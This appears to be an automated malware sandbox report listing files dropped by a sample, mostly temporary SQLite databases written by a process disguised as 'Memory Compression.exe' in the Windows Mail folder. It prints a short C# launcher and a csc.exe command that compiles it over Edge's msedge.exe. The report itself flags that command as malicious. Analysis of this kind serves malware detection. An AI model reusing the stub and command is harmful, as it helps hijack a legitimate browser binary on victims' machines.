                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\2I0J0TBsk4

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\2JrgoxZJQp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\2UmcMKaHOp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\2a0x1GcGhd

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.0.cs

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):420
                                                                                                                                Entropy (8bit):4.930945496079894
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LSMyCaiFkD:JNVQIbSfhWLzIiFkMSfhWLSM37FkD
                                                                                                                                MD5:2B5C64B5EC55507CB4F69546C3BDD2B4
                                                                                                                                SHA1:C9B1FAB6BAE04EED3E7E8AB5BCE819F4788FAD48
                                                                                                                                SHA-256:3ED5312D12D34A685B18DC49DDDEB7DCEC61C810ED16095D57995FE6DDF9E1CD
                                                                                                                                SHA-512:4B3513BF8073F0F93C42D084F06C57AA7FA88F3C5379A4389D2EFC17DF75EA29DD17664F657AF73A3E6C266A13BFEEEEDF21D4B1EDA125BEE41DB45AA38C1AF5
                                                                                                                                Malicious:false
                                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows mail\Memory Compression.exe"); } catch { } }).Start();. }.}.

                                                                                                                                C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):266
                                                                                                                                Entropy (8bit):5.149047394036724
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fG69Hn:Hu7L//TRRzscQyPHn
                                                                                                                                MD5:296B847BE1762F859AC7CC1FA6859B5C
                                                                                                                                SHA1:5818839A068B1A4A5370668DBC4B397223890C82
                                                                                                                                SHA-256:3165C30F31A38E868B736E3244132607D2A7684B041BEBEDC85FEE149F8E2325
                                                                                                                                SHA-512:3818D19D3AEA67798D0F90B95310E00A28701D7B442BBD72CC4924D99DED44A7E9CA8E68D02B3261C9184A4FF10A60ED2A64F8FB53397F4BF135FD2F4540E9F6
                                                                                                                                Malicious:true
                                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.0.cs"

                                                                                                                                C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.out

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):767
                                                                                                                                Entropy (8bit):5.2483071481458134
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:KMi/I/u7L//TRRzscQyPHuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzsty/uKax5DqBVKVrdFAMb
                                                                                                                                MD5:D48E5DF2D2624411A1D80377F7090706
                                                                                                                                SHA1:3756AA74E0FB2044DA6A24E9627B934B32FDD091
                                                                                                                                SHA-256:DD60F02470E635B458D439C444116BE0AD49F7C1F2CE5F1F731B5CCBFD1061EF
                                                                                                                                SHA-512:606FADEAECC216140406E53A93314A5B01E6F8765953798EBBBF1FF37E08F51677F01C77FFDF774D1E9EFA4774E1ABF1857EEA2E62ADCFC36FE26A92A52D6010
                                                                                                                                Malicious:false
                                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                C:\Users\user\AppData\Local\Temp\2yBqTd0faR

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\3slZnImLGR

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\4OXjcLr9ju

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\4Ucd51ngZz

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\4ula3J7Y4Y

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\57C8KqStMT

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5BffgjA6wp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5Cx640U7Mt

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5Hq7laZTwg

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5Ia2dJGMXY

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5M1rxeegP9

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5fOfIYWjF1

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5qSNcXdXyw

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\5ubJKn0IKQ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
